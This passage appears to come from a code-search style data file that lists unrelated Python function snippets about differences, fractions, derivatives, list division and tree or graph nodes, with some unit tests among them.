mppath.Path.CLOSEPOLY\n\n polyPath = mppath.Path(polyVertices, polyCodes)\n cutPath = mppath.Path(cutVertices, cutCodes)\n\n #How you want the information returned \n if returnFmt == -2:\n return [[cutVertices, cutPath], fracPoints]\n if returnFmt == -1:\n return fracPoints\n if returnFmt == 0:\n return [cutVertices, cutPath]\n if returnFmt == 1:\n return [polyVertices, polyPath]\n if returnFmt == 2:\n return [[cutVertices, cutPath], [polyVertices, polyPath]]", "def _computeDerivative(self,angles, distances):\n slope=[]\n slope.append(0)\n for i in xrange(1,len(angles)):\n der = (distances[i]-distances[i-1])/(angles[i]-angles[i-1])\n slope.append(der)\n #slope.append(0)\n return slope", "def diff_frac(data_1, data_2):\n\n frac_1 = np.sum(data_1) / len(data_1)\n frac_2 = np.sum(data_2) / len(data_2)\n\n return frac_1 - frac_2", "def _compute_diff(self, begin, end):\n d = self.diff\n x = self.x\n for i in range(begin, end):\n for j in range(i):\n d[i].append((d[i][j] - d[i-1][j]) / (x[i] - x[i-j-1]))", "def rat2frac_list(x, y):\n\tcont = rat2cont_quot(x, y)\n\tfrac = []\n\tfor i in range(len(cont)):\n\t\tfrac.append(cont2frac(cont[:(i+1)]))\n\treturn frac", "def differences(data: list) -> list:\n differences = []\n iterable, copy = tee(data)\n next(copy) # adjusts copy of my iterable up 1 element\n for x, y in zip(iterable, copy):\n differences.append(abs(x - y))\n\n return differences", "def test_frac_diffGaps(self):\n s1 = self.RNA(\"AAAA\")\n s2 = self.RNA(\"GGGG\")\n s3 = self.RNA(\"----\")\n s4 = self.RNA(\"A-A-\")\n s5 = self.RNA(\"-G-G\")\n s6 = self.RNA(\"UU--\")\n s7 = self.RNA(\"-\")\n s8 = self.RNA(\"GGG\")\n e = self.RNA(\"\")\n self.assertEqual(s1.frac_diff_gaps(s1), 0)\n self.assertEqual(s1.frac_diff_gaps(s2), 0)\n self.assertEqual(s1.frac_diff_gaps(s3), 1)\n self.assertEqual(s1.frac_diff_gaps(s4), 0.5)\n self.assertEqual(s1.frac_diff_gaps(s5), 0.5)\n self.assertEqual(s1.frac_diff_gaps(s6), 0.5)\n self.assertEqual(s1.frac_diff_gaps(s7), 1)\n self.assertEqual(s1.frac_diff_gaps(e), 0)\n self.assertEqual(s3.frac_diff_gaps(s3), 0)\n self.assertEqual(s3.frac_diff_gaps(s4), 0.5)\n self.assertEqual(s3.frac_diff_gaps(s7), 0.0)\n self.assertEqual(e.frac_diff_gaps(e), 0.0)\n self.assertEqual(s4.frac_diff_gaps(s5), 1.0)\n self.assertEqual(s4.frac_diff_gaps(s6), 0.5)\n self.assertFloatEqual(s6.frac_diff_gaps(s8), 1 / 3.0)", "def test_frac_diff(self):\n s1 = self.RNA(\"ACGU\")\n s2 = self.RNA(\"AACG\")\n s3 = self.RNA(\"GG\")\n s4 = self.RNA(\"A\")\n e = self.RNA(\"\")\n self.assertEqual(s1.frac_diff(e), 0)\n 
self.assertEqual(s1.frac_diff(s2), 0.75)\n self.assertEqual(s1.frac_diff(s3), 1)\n self.assertEqual(s1.frac_diff(s4), 0) # note truncation", "def diff(self, value):\n if hasattr(value, \"__len__\"):\n if len(value) == len(self):\n for node, val in zip(self, value):\n node.diff = val\n return\n else:\n raise RxDException(\n \"diff must either be a scalar or an iterable of the same length as the NodeList\"\n )\n for node in self:\n node.diff = value", "def deltas(L):\n return map(sub, tuple(L)[1:], L)", "def __diff_internal(self):\n assert self.p > 0, \"order of Bspline must be > 0\" # we already handle the other case in diff()\n\n # https://www.cs.mtu.edu/~shene/COURSES/cs3621/NOTES/spline/B-spline/bspline-derv.html\n #\n t = self.knot_vector\n p = self.p\n bi = BsplineBasis(t[:-1], p - 1)\n bip1 = BsplineBasis(t[1:], p - 1)\n\n numer1 = +p\n numer2 = -p\n denom1 = t[p:-1] - t[:-(p + 1)]\n denom2 = t[(p + 1):] - t[1:-p]\n\n with np.errstate(divide='ignore', invalid='ignore'):\n ci = np.where(denom1 != 0., (numer1 / denom1), 0.)\n cip1 = np.where(denom2 != 0., (numer2 / denom2), 0.)\n\n return (ci, bi), (cip1, bip1)", "def find_fractions():\n num_list = []\n den_list = []\n for n in range(10, 100):\n for d in range(10, 100):\n if d > n:\n x = n / d\n ln = list(str(n))\n ld = list(str(d))\n if (ln[0] == ld[1]) and (ln[0] != '0'):\n if ld[0] != '0':\n if (int(ln[1]) / int(ld[0])) == x:\n print \"n/d =\", n, d\n num_list.append(n)\n den_list.append(d)\n else:\n continue\n elif (ln[1] == ld[0]) and (ln[1] != '0'):\n if ld[1] != '0':\n if (int(ln[0]) / int(ld[1])) == x:\n print \"n/d =\", n, d\n num_list.append(n)\n den_list.append(d)\n else:\n continue\n else:\n continue\n return num_list, den_list", "def diff(self):\n\t\tif len(self.v) < 4:\n\t\t\treturn None\n\t\tif self.poli == None:\n\t\t\tself.generar_polinomio()\n\t\tif x != None:\n\t\t\treturn diff(self.poli)(x)\n\t\treturn diff(self.poli)", "def _extract_fraction_with_text_nl(tokens, short_scale, ordinals):\n for c in _FRACTION_MARKER_NL:\n partitions = partition_list(tokens, lambda t: t.word == c)\n\n if len(partitions) == 3:\n numbers1 = \\\n _extract_numbers_with_text_nl(partitions[0], short_scale,\n ordinals, fractional_numbers=False)\n numbers2 = \\\n _extract_numbers_with_text_nl(partitions[2], short_scale,\n ordinals, fractional_numbers=True)\n\n if not numbers1 or not numbers2:\n return None, None\n\n # ensure first is not a fraction and second is a fraction\n num1 = numbers1[-1]\n num2 = numbers2[0]\n if num1.value >= 1 and 0 < num2.value < 1:\n return num1.value + num2.value, \\\n num1.tokens + partitions[1] + num2.tokens\n\n return None, None", "def calculate_deltas(tvals, tp_confidences, fp_confidences, num_samples):\n deltas = []\n tp_percentages = []\n fp_percentages = []\n for tval in tvals:\n dval, tp_pct, fp_pct = delta(\n tval,\n tp_confidences,\n fp_confidences,\n num_samples\n )\n deltas.append(dval)\n tp_percentages.append(tp_pct)\n fp_percentages.append(fp_pct)\n return deltas, tp_percentages, fp_percentages", "def divide_microstructure_unit(self,point1,point2,dimensions):\n\t\tnew_sections = []\n\t\tif len(point1) < 4:\n\t\t\tdone = 0.0\n\t\t\tdtwo = 0.0\n\t\telse:\n\t\t\tdone = point1[-1]\n\t\t\tdtwo = point2[-1]\n\t\t\n\t\tp1 = np.array(point1[:3])\n\t\tp2 = np.array(point2[:3])\n\t\tvec = p2-p1\n\t\tdimslength = float(np.sum(dimensions))\n\t\tfor d,dim in enumerate(dimensions[:-1]):\n\t\t\tnearsideproportion = np.sum(dimensions[:d])/dimslength\n\t\t\tfarsideproportion = 
np.sum(dimensions[:d+1])/dimslength\n\t\t\tnew_sections.append([\t\n\t\t\t\t\t\tlist(np.append(p1+vec*nearsideproportion,done)),\n\t\t\t\t\t\tlist(np.append(((p1+vec*nearsideproportion)+(p1+vec*farsideproportion))/2.0,(done+dtwo)/2.0)),\n\t\t\t\t\t\tlist(np.append(p1+vec*farsideproportion,dtwo))\n\t\t\t\t\t\t])\n\t\t\n\t\tnew_sections.append([\t\n\t\t\t\t\tlist(new_sections[-1][-1]),\n\t\t\t\t\tlist((np.array(new_sections[-1][-1])+np.array(list(point2[:3])+[dtwo]))/2.0),\n\t\t\t\t\tlist(point2[:3])+[dtwo]\n\t\t\t\t\t])\n\t\t\n\t\tif len(dimensions) > 2:\n\t\t\treturn(new_sections,['node','paranode1','paranode2','internode','paranode2','paranode1'][:len(new_sections)])\n\t\t\n\t\telse:\n\t\t\treturn(new_sections,['interbouton','bouton'][:len(new_sections)])", "def find_sharpest_fork_general(Nodes):\n pair_list = []\n Dis = np.array([])\n for n in Nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def divideWork(self,ratios):\r\n \r\n taskCount = 0\r\n\r\n #Sums up the ratio amounts\r\n for nodeId,ratio in ratios.iteritems():\r\n taskCount += ratio\r\n\r\n #Divide the work into 'taskCount' chunks\r\n [primer,prefix] = WorkRange(self.charset).divideMore(self.primer,self.prefix,taskCount)\r\n \r\n prim = {}\r\n pref = {}\r\n \r\n for nodeId,ratio in ratios.iteritems():\r\n prim[nodeId] = []\r\n pref[nodeId] = []\r\n\r\n #Assigns each node 'ratio' amount chunks\r\n for i in range(ratio):\r\n prim[nodeId].append(primer.pop())\r\n pref[nodeId].append(prefix.pop())\r\n\r\n\r\n return [prim,pref]", "def derivative(requestContext, seriesList):\n results = []\n for series in seriesList:\n newValues = []\n prev = None\n for val in series:\n if None in (prev,val):\n newValues.append(None)\n prev = val\n continue\n newValues.append(val - prev)\n prev = val\n newName = \"derivative(%s)\" % series.name\n newSeries = TimeSeries(newName, series.start, series.end, series.step, newValues)\n newSeries.pathExpression = newName\n results.append(newSeries)\n return results", "def diff_op(self, args: List[float], time: float) -> List[float]:\n v, nK, ca = args\n ca_args: List[float] = [v, ca]\n dvdt: float = self.dvdt(args=args)\n dnKdt: float = self.kvhh.dndt(v=v, n=nK)\n dCadt: float = self.dCadt(args=ca_args)\n return [dvdt, dnKdt, dCadt]", "def split_distances(self, remaining: List[int], distances: List[float], mid: int) -> List[List[int]]:\n closer, farther = [], []\n for index in remaining:\n if distances[index] <= mid:\n closer.append(index)\n else:\n farther.append(index)\n return [closer, farther]", "def calc_diffs(self, y, x, locs):\n res = {}\n \n for item, value in locs.iteritems():\n res[item] = self.slab_ratio * (self.grid[y, x] - self.grid[value['y'], value['x']])\n \n return res", "def test_compare_old_to_new_method_to_create_trees(self):\n nodes = util.generate_sequence_of_points(2, 2)\n tree1 = kdtree.createNewTree(nodes)\n kdtree.visualize(tree1)\n \n sel_axis = (lambda axis: axis)\n tree2 = kdtree.createNewTree([[0.5, 0.5]],axis = 0, sel_axis= sel_axis)\n tree2.split2([0.25, 0.5], axis = 1)\n tree2.split2([0.75, 0.5], axis = 1)\n \n #left\n tree2.split2([0.25, 0.25], axis = 0, sel_axis = sel_axis)\n 
tree2.split2([0.25, 0.75], axis = 0, sel_axis = sel_axis)\n \n #right\n tree2.split2([0.75, 0.25], axis = 0, sel_axis = sel_axis)\n tree2.split2([0.75, 0.75], axis = 0, sel_axis = sel_axis)\n \n kdtree.visualize(tree2)\n \n for n in zip(kdtree.level_order(tree1), kdtree.level_order(tree2)):\n self.assertEqual(n[0].data, n[1].data, \"elements not equal\")\n \n if n[0].data is not None and n[1].data is not None:\n self.assertEqual(n[0].axis, n[1].axis, \"elements not equal\")", "def compareNodes(x, y):\n return x.pathValue - y.pathValue", "def getNodesAndDistances():\n\n\tglobal width, height\n\n\t# First we generate the list\n\n\tprint \"\\tGetting node list...\"\n\t\n\tnodeDict = {}\n\n\tfor y in range(height):\n\t\tfor x in range(width):\n\t\t\ttheType = getSquare(x, y)\n\n\t\t\tprint \"\\t\\tGetting list for node (%d, %d) of type %d...\" % (x, y, theType)\n\n\t\t\ttempList = getNodeList(x, y, theType)\n\n\t\t\tif tempList == []:\n\t\t\t\tprint \"\\t\\t\\tNo nodes here.\"\n\t\t\telse:\n\t\t\t\tfor i in range(len(tempList)):\n\t\t\t\t\tnode = tempList[i]\n\t\t\t\t\tnodeName = node[0]\n\t\t\t\t\tnodeDict[nodeName] = node[1:]\t# Everything but the first element\n\t\t\t\t\tprint \"\\t\\t\\tAdded node '%s'...\" % nodeName\n\n\tprint \"\\tDone getting node list (%d nodes)...\" % (len(nodeDict.keys()))\n\tprint \"\"\n\n\t# Now that we've got that, we get a list of pairs\n\n\tpairList = getPairList(nodeDict)\n\n\t# Now we calculate the distance between every pair of nodes that connect\n\n\tprint \"\"\n\tprint \"\\tCreateing dictionary of distances between connected nodes...\"\n\n\tdistanceDict = {}\n\n\tfor tuple in pairList:\n\t\t(nodeA, nodeB) = tuple\n\t\tprint \"\\t\\tCalculating distance between '%s' and '%s'...\" % (nodeA, nodeB)\n\t\tdistance = distanceBetween(nodeA, nodeB, nodeDict)\n\t\tpairName = \"%s%s\" % (nodeA, nodeB)\n\t\tdistanceDict[pairName] = distance\n\t\tprint \"\\t\\t\\tDistace was %f.\" % (distance)\n\n\tprint \"\\tDone creating dictionary of node differences (%d pairs).\" % (len(distanceDict.keys()))\n\n\treturn nodeDict, distanceDict", "def _compare_elements(self, old, new):\n res = None\n # We want to go through the tree post-order\n if isinstance(old, dict):\n res_dict = self.compare_dicts(old, new)\n if (len(res_dict) > 0):\n res = res_dict\n # Now we are on the same level\n # different types, new value is new\n elif (type(old) != type(new)):\n res = {'---': old, '+++': new}\n # recursive arrays\n # we can be sure now, that both new and old are\n # of the same type\n elif (isinstance(old, list)):\n res_arr = self._compare_arrays(old, new)\n if (len(res_arr) > 0):\n res = res_arr\n # the only thing remaining are scalars\n else:\n scalar_diff = self._compare_scalars(old, new)\n if scalar_diff is not None:\n res = scalar_diff\n\n return res", "def find_sharpest_fork(nodes):\n pair_list = []\n Dis = np.array([])\n for n in nodes:\n if n.parent is not None:\n if n.parent.parent is not None:\n a = n.parent.children\n if(isinstance(a, list)):\n if(len(a)==2):\n n1 = a[0]\n n2 = a[1]\n if(len(n1.children) == 0 and len(n2.children) == 0):\n pair_list.append([n1 , n2])\n dis = LA.norm(a[0].xyz - a[1].xyz,2)\n Dis = np.append(Dis,dis)\n if(len(Dis)!= 0):\n (b,) = np.where(Dis == Dis.min())\n sharpest_pair = pair_list[b[0]]\n distance = Dis.min()\n else:\n sharpest_pair = [0,0]\n distance = 0.\n return sharpest_pair, distance", "def calculate_distance_to_divide(\n grid, longest_path=True, add_to_grid=False, clobber=False\n):\n # check that flow__receiver nodes exists\n if 
\"flow__receiver_node\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__receiver_node' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"flow__upstream_node_order\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n if \"drainage_area\" not in grid.at_node:\n raise FieldError(\n \"A 'flow__upstream_node_order' field is required at the \"\n \"nodes of the input grid.\"\n )\n\n # get the reciever nodes, depending on if this is to-one, or to-multiple,\n # we'll need to get a different at-node field.\n if grid.at_node[\"flow__receiver_node\"].size != grid.size(\"node\"):\n to_one = False\n else:\n to_one = True\n\n flow__receiver_node = grid.at_node[\"flow__receiver_node\"]\n drainage_area = grid.at_node[\"drainage_area\"]\n\n # get the upstream node order\n flow__upstream_node_order = grid.at_node[\"flow__upstream_node_order\"]\n\n # get downstream flow link lengths, result depends on type of grid.\n if isinstance(grid, RasterModelGrid):\n flow_link_lengths = grid.length_of_d8[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n else:\n flow_link_lengths = grid.length_of_link[\n grid.at_node[\"flow__link_to_receiver_node\"]\n ]\n\n # create an array that representes the distance to the divide.\n distance_to_divide = np.zeros(grid.nodes.size)\n\n if not longest_path:\n distance_to_divide[:] = 2 * grid.size(\"node\") * np.max(flow_link_lengths)\n\n # iterate through the flow__upstream_node_order backwards.\n for node in reversed(flow__upstream_node_order):\n # if drainage are is equal to node cell area, set distance to zeros\n # this should handle the drainage divide cells as boundary cells have\n # their area set to zero.\n if drainage_area[node] == grid.cell_area_at_node[node]:\n distance_to_divide[node] = 0\n\n # get flow recievers\n reciever = flow__receiver_node[node]\n\n if to_one:\n # if not processing an outlet node.\n if reciever != node:\n if longest_path:\n cond = (\n distance_to_divide[reciever]\n < distance_to_divide[node] + flow_link_lengths[node]\n )\n else:\n cond = (\n distance_to_divide[reciever]\n > distance_to_divide[node] + flow_link_lengths[node]\n )\n\n if cond:\n distance_to_divide[reciever] = (\n distance_to_divide[node] + flow_link_lengths[node]\n )\n\n else:\n # non-existant links are coded with -1\n useable_receivers = np.where(reciever != grid.BAD_INDEX)[0]\n\n for idx in range(len(useable_receivers)):\n r = reciever[useable_receivers][idx]\n fll = flow_link_lengths[node][useable_receivers][idx]\n\n # if not processing an outlet node.\n if r != node:\n if longest_path:\n cond = distance_to_divide[r] < distance_to_divide[node] + fll\n else:\n cond = distance_to_divide[r] > distance_to_divide[node] + fll\n\n if cond:\n distance_to_divide[r] = distance_to_divide[node] + fll\n\n # store on the grid\n if add_to_grid:\n grid.add_field(\n \"distance_to_divide\", distance_to_divide, at=\"node\", clobber=clobber\n )\n\n return distance_to_divide", "def split_translation(t):\n from math import fmod\n\n def _split1(x):\n x_part = fmod(x, 1.0)\n x_whole = x - x_part\n if x_part > 0.5:\n x_part -= 1\n x_whole += 1\n elif x_part < -0.5:\n x_part += 1\n x_whole -= 1\n\n return (x_whole, x_part)\n\n _tt = [_split1(x) for x in t]\n\n return tuple(t[0] for t in _tt), tuple(t[1] for t in _tt)", "def dif_prog_div(x, y):\n\n dd = np.zeros([len(y), len(y)]) \n dd[0] = y\n dd[1,:-1] = (dd[0,1:] - dd[0,:-1]) / (x[1:]-x[:-1])\n\n for i in range(2,len(y)):\n dd[i,:-i] = 
(dd[i-1,1:-(i-1)] - dd[i-1,:-i]) / (x[i:]-x[:-i])\n\n return dd", "def alldiff():\n res = {'Computation-alldiff-0': {'Experiment': 'alldiff',\n 'Parameters': {'w': 5, 'x': 1, 'z': 4},\n 'Results': {'f1': 15, 'f2': 51}},\n 'Computation-alldiff-1': {'Experiment': 'alldiff',\n 'Parameters': {'w': 6, 'x': 1, 'z': 4},\n 'Results': {'f1': 16, 'f2': 61}},\n 'Computation-alldiff-2': {'Experiment': 'alldiff',\n 'Parameters': {'w': 5, 'x': 2, 'z': 4},\n 'Results': {'f1': 25, 'f2': 52}},\n 'Computation-alldiff-3': {'Experiment': 'alldiff',\n 'Parameters': {'w': 6, 'x': 2, 'z': 4},\n 'Results': {'f1': 26, 'f2': 62}},\n 'Computation-alldiff-4': {'Experiment': 'alldiff',\n 'Parameters': {'w': 5, 'x': 3, 'z': 4},\n 'Results': {'f1': 35, 'f2': 53}},\n 'Computation-alldiff-5': {'Experiment': 'alldiff',\n 'Parameters': {'w': 6, 'x': 3, 'z': 4},\n 'Results': {'f1': 36, 'f2': 63}}}\n\n # Notice the ordering\n domain = {'x':[\"1\", \"2\", \"3\"], 'w':[\"5\", \"6\"]}\n metadata = {'z':\"4\"}\n parameters = [\"x\", \"w\"]\n parameters.sort()\n metrics = [\"f1\", \"f2\"]\n metrics.sort()\n exp_name = \"alldiff\"\n return exp_name, metadata, parameters, domain, metrics, res", "def division(i, S, Gi, NG):\n\n NGX = [dict() for _ in NG]\n\n C = set()\n\n for v in S:\n c = Gi.node[v]['class']\n NG[i][c].remove(v)\n if not NGX[i].has_key(c):\n NGX[i][c] = set()\n NGX[i][c].add(v)\n C.add(c)\n\n # split class table\n for c in C:\n # copy/move entries of NGX[j] table \n for j in xrange(len(NG)):\n if j == i:\n # remove the entry NG[i] (where S is from) if empty\n if not NG[i][c]:\n del NG[i][c]\n else:\n if NG[i].has_key(c) and NG[i][c]:\n NGX[j][c] = set(NG[j][c])\n else:\n NGX[j][c] = NG[j].pop(c)\n return NGX", "def difference(*colls):\n\n # Get all the leaf paths for each collection: make each path a tuple\n leaf_paths_by_coll = list(map(lambda c: list(map(tuple, get_all_leaf_paths(c))), colls))\n\n # Find the union of all leaf paths: merge all the paths and keep only the unique paths\n union_leaf_paths = list(distinct(concat(*leaf_paths_by_coll)))\n\n # Get the values corresponding to these leaf paths in every collection: if a leaf path doesn't exist, assumes None\n values_by_coll = list(map(lambda lp: list(map(lambda coll: tz.get_in(lp, coll), colls)), union_leaf_paths))\n\n # Filter out the leaf paths that have identical values across the collections\n keep_leaf_paths = list(map(0, filter(lambda t: not allequal(t[1]), zip(union_leaf_paths, values_by_coll))))\n keep_values = list(map(1, filter(lambda t: not allequal(t[1]), zip(union_leaf_paths, values_by_coll))))\n\n # Rearrange to construct a list of dictionaries -- one per original collection.\n # Each of these dictionaries maps a 'kept' leaf path to its corresponding\n # value in the collection\n differences = list(map(lambda vals: dict(zip(keep_leaf_paths, vals)), list(zip(*keep_values))))\n\n return differences", "def compute_divergence(self):\n d_tr_a = []\n d_te_a = []\n for k in self.synth_keys:\n d_tr_a.append(self.divergence('tr', k))\n d_te_a.append(self.divergence('te', k))\n\n training = np.mean(np.array(d_tr_a))\n testing = np.mean(np.array(d_te_a))\n return training, testing", "def _collect_num_denom(ast, nums, denoms):\n if not (isinstance(ast, Mul) or isinstance(ast, Div)):\n # If ast is not multiplication or division, just put it in nums.\n nums.append(ast)\n return\n\n if isinstance(ast.left, Div) or isinstance(ast.left, Mul):\n # If the left argument is a multiplication or division, descend into\n # it, otherwise it is in the numerator.\n 
_collect_num_denom(ast.left, nums, denoms)\n else:\n nums.append(ast.left)\n\n if isinstance(ast.right, Div) or isinstance(ast.right, Mul):\n # If the left argument is a multiplication or division, descend into\n # it, otherwise it is in the denominator.\n if isinstance(ast, Mul):\n _collect_num_denom(ast.right, nums, denoms)\n elif isinstance(ast, Div):\n # Note that when we descend into the denominator of a Div, we want \n # to swap our nums and denoms lists\n _collect_num_denom(ast.right, denoms, nums)\n else:\n if isinstance(ast, Mul):\n nums.append(ast.right)\n elif isinstance(ast, Div):\n denoms.append(ast.right)", "def extractTree(nodesList, rootNode):\n if len(nodesList) == 0:\n return\n if nodesList[0] == '!':\n return nodesList[1:]\n\n splitAttribute, splitValue, attributeValue = nodesList[0].strip().split('-')\n nodesList = nodesList[1:]\n \n if splitAttribute != splitValue or splitAttribute != '$' or splitValue != '$':\n rootNode.setSplit((splitAttribute, splitValue))\n else:\n rootNode.setSplit(\"Base case\")\n rootNode.setData(attributeValue)\n return nodesList[2:]\n \n \n leftTree = Tree()\n rightTree = Tree()\n rootNode.setLesser(leftTree)\n rootNode.setGreater(rightTree)\n nodesList = extractTree(nodesList, leftTree)\n\n \n \n nodesList = extractTree(nodesList, rightTree)\n\n return nodesList", "def _get_packet_intervals(\n packets: Sequence[Packet],\n node: int,\n getter: Callable[[Packet, int], float]\n) -> np.ndarray:\n prev_time = 0.0\n intervals = []\n for packet in packets:\n if packet.was_served[node]:\n new_time = getter(packet, node)\n intervals.append(new_time - prev_time)\n prev_time = new_time\n return np.asarray(intervals)", "def find_diff_nodes(S,T):\n diff_nodes = []\n for node in S:\n s_formula = S.formula_conj(node)\n t_formula = T.formula_conj(node)\n if s_formula != t_formula:\n diff_nodes.append(node)\n return diff_nodes", "def diff(self,images):\n diffArray = [0,1,2,3]\n\n # compute the difference bewteen two adjacent images in the same ovtave\n for i in range(1,5):\n diffArray[i-1] = images[i]-images[i-1]\n\n return numpy.array(diffArray)", "def divide_list(ld, division):\n buckets = []\n current = []\n for obj in ld:\n if len(current) < division:\n current.append(obj)\n else:\n buckets.append(current)\n current = [obj]\n if len(current) > 0:\n buckets.append(current)\n return buckets", "def cell_division(waitlist, celllist, AgEpitope, tnow, mut_list, RNs):\n for cell in celllist:\n # get list of 0 to 2 daughters\n dlist, mut_list = divide(cell, AgEpitope, tnow, mut_list, RNs)\n # add daughters to waitlist\n waitlist = waitlist + dlist\n return waitlist, mut_list", "def vars_divide ( self , var1 , var2 , name = '' , title = '' ) :\n \n f1 = isinstance ( var1 , num_types )\n f2 = isinstance ( var2 , num_types )\n\n if f1 and f2 :\n res = float ( var1 ) / float ( var2 )\n return ROOT.RooRealConstant.value ( res ) \n elif f1 :\n var1 = ROOT.RooRealConstant.value ( var1 ) \n return self.vars_divide ( var1 , var2 , name , title )\n elif f2 :\n return self.vars_multiply ( var1 , 1.0/var2 , name , title )\n \n self.aux_keep.append ( var1 )\n self.aux_keep.append ( var2 )\n\n result = Ostap.MoreRooFit.Division ( var1 , var2 )\n self.aux_keep.append ( result )\n \n return result", "def divergence(tensor, dx=1, difference='central'):\n assert difference in ('central', 'forward', 'backward'), difference\n rank = spatial_rank(tensor)\n if difference == 'forward':\n return _divergence_nd(tensor, (0, 1)) / dx ** rank\n elif difference == 'backward':\n return 
_divergence_nd(tensor, (-1, 0)) / dx ** rank\n else:\n return _divergence_nd(tensor, (-1, 1)) / (2 * dx) ** rank", "def difference(G, H):\n\n if G.order() != H.order():\n msg = \"Node sets of the two directed graphs are not equal!\"\n raise StaticGraphNotEqNodesException(msg)\n \n n_nodes = G.order()\n edges = ((u, v) for u in G.nodes()\n for v in set(G.successors(u)) - set(H.successors(u)))\n deg = make_deg(n_nodes, edges)\n edges = ((u, v) for u in G.nodes()\n for v in set(G.successors(u)) - set(H.successors(u)))\n D = make(n_nodes, G.size(), edges, deg)\n return D", "def test_interpolation(self):\n\n ndx1, ndx2 = self.find_partition()\n tessellation = Delaunay(self.grid[ndx2,:])\n\n # initialisation\n results = []\n ndim = self.ndim+1\n\n for j in ndx1:\n nmodels = len(self.tracks[j].models)\n aResult = np.empty((nmodels,ndim+nglb+6),dtype=gtype)\n pt = self.tracks[j].params + [0.0,]\n\n for i in range(nmodels):\n aModel1 = self.tracks[j].models[i]\n pt[-1] = aModel1.glb[iage]\n aModel2 = interpolate_model(self,pt,tessellation,ndx2)\n aResult[i,0:ndim] = pt\n if (aModel2 is None):\n aResult[i,ndim:ndim+nglb+6] = np.nan\n else:\n aResult[i,ndim:ndim+nglb+6] = compare_models(aModel1,aModel2)\n\n results.append(aResult)\n\n return results, ndx1, ndx2, tessellation", "def diffSeries(requestContext, *seriesLists):\n (seriesList,start,end,step) = normalize(seriesLists)\n name = \"diffSeries(%s)\" % formatPathExpressions(seriesList)\n values = ( safeDiff(row) for row in izip(*seriesList) )\n series = TimeSeries(name,start,end,step,values)\n series.pathExpression = name\n return [series]", "def DataDiff(source, target, compare_list_as_value=True, depth=0, no_difference_value=None):\n # Ensure recursion doesnt go out of control\n if depth > 150:\n raise Exception('DataDiff recurlsion depth has hit limit (50), aborting.')\n\n # If we are not working with 2 different containers we can inspect, then do a simple check\n if type(source) not in (list, tuple, dict) or type(target) not in (list, tuple, dict):\n # If the types are different, the data is different (and cant be compared more)\n if type(source) != type(target):\n return (source, target)\n # Else, theyre the same types, if the values are different\n elif source != target:\n return (source, target)\n # Else, theyre the same types and value\n else:\n # This should only happen if this is a fresh DataDiff() call, depth==0\n if depth == 0:\n return (no_difference_value, no_difference_value)\n else:\n raise Exception('This should never happen, having a mismatching value different in anywhere but depth=0')\n\n\n if type(source) in (list, tuple):\n source_diff = []\n elif type(source) == dict:\n source_diff = {}\n else:\n raise Exception('Unhandled source_diff data type: %s' % type(source))\n\n if type(target) in (list, tuple):\n target_diff = []\n elif type(target) == dict:\n target_diff = {}\n else:\n raise Exception('Unhandled target_diff data type: %s' % type(target))\n\n # Check for incompatible types, and just return them both as theyre totally different\n if type(source_diff) != type(target_diff):\n return (source, target)\n\n # If we're handling a Dictionary compare\n if type(source_diff) == dict:\n # Process the source keys first\n for key in source.keys():\n _CompareDictValue(key, source, target, source_diff, target_diff, compare_list_as_value, no_difference_value, depth)\n\n # Process the target keys next, skipping any source keys we already processed\n for key in target.keys():\n # Skip any keys we already processed in source\n if key in 
source:\n continue\n\n # Reverse target/source, so that the reverse comparison/set is done\n _CompareDictValue(key, target, source, target_diff, source_diff, compare_list_as_value, no_difference_value, depth)\n\n # Else, if we're handling a List compare\n elif type(source_diff) == list:\n # If lists must be compared in total because the order of a list is important\n if compare_list_as_value:\n if source != target:\n return (list(source), list(target))\n\n # Else, compare each element of the list\n else:\n for count in range(0, len(source)):\n if count >= len(target):\n source_diff.append(source[count])\n elif source[count] != target[count]:\n source_diff.append(source[count])\n target_diff.append(target[count])\n\n # If the target has more elements than the source, add the rest \n if len(target) > len(source):\n target_diff += target[-(len(source) - len(target)):]\n\n else:\n raise Exception('Unspecified type handler for data: %s. Only dict and list/tuple types are accepted.')\n\n return (source_diff, target_diff)", "def group_and_vote_fractions():\n group_share = np.array([0, 0.2, 0.4, 0.6, 0.8])\n vote_share = np.array([0, 0.2, 0.4, 0.6, 0.8])\n return group_share, vote_share", "def get_deltas(temps, vals, ts_index):\n nan_array = np.full([len(temps)], np.nan)\n vals_react = nan_array\n vals_ts = nan_array\n vals_prod = nan_array\n # any files before the ts will be a reactant file\n for index in range(len(vals)):\n if index == 0:\n vals_react = vals[index]\n elif index < ts_index:\n vals_react += vals[index]\n elif index == ts_index:\n vals_ts = vals[index]\n elif index == ts_index + 1:\n vals_prod = vals[index]\n else:\n vals_prod += vals[index]\n delta_ts = vals_ts - vals_react\n delta_rxn = vals_prod - vals_react\n return delta_ts, delta_rxn", "def compute(self, node, input_vals):\r\n assert len(input_vals) == 2\r\n return input_vals[0] - input_vals[1]", "def diff_op(self, args: List[float], time: float) -> List[float]:\n v, h_nav, n_kvhh, h_kva, m_kvsi, s_ampar, x_nmdar, s_nmdar, s_gabar, ca = args\n ca_args: List[float] = [v, s_nmdar, ca]\n\n if self.ion:\n self.set_vCa(in_ca=ca)\n\n dvdt: float = self.dvdt(args=args)\n dhNadt: float = self.nav.dhdt(v=v, h=h_nav)\n dnKdt: float = self.kvhh.dndt(v=v, n=n_kvhh)\n dhAdt: float = self.kva.dhdt(v=v, h=h_kva)\n dmKSdt: float = self.kvsi.dmdt(v=v, m=m_kvsi)\n dsAMPAdt: float = self.ampar.dsdt(v=v, s=s_ampar)\n dxNMDAdt: float = self.nmdar.dxdt(v=v, x=x_nmdar)\n dsNMDAdt: float = self.nmdar.dsdt(v=v, s=s_nmdar, x=x_nmdar)\n dsGABAdt: float = self.gabar.dsdt(v=v, s=s_gabar)\n dCadt: float = self.dCadt(args=ca_args)\n return [dvdt, \n dhNadt, \n dnKdt, \n dhAdt, 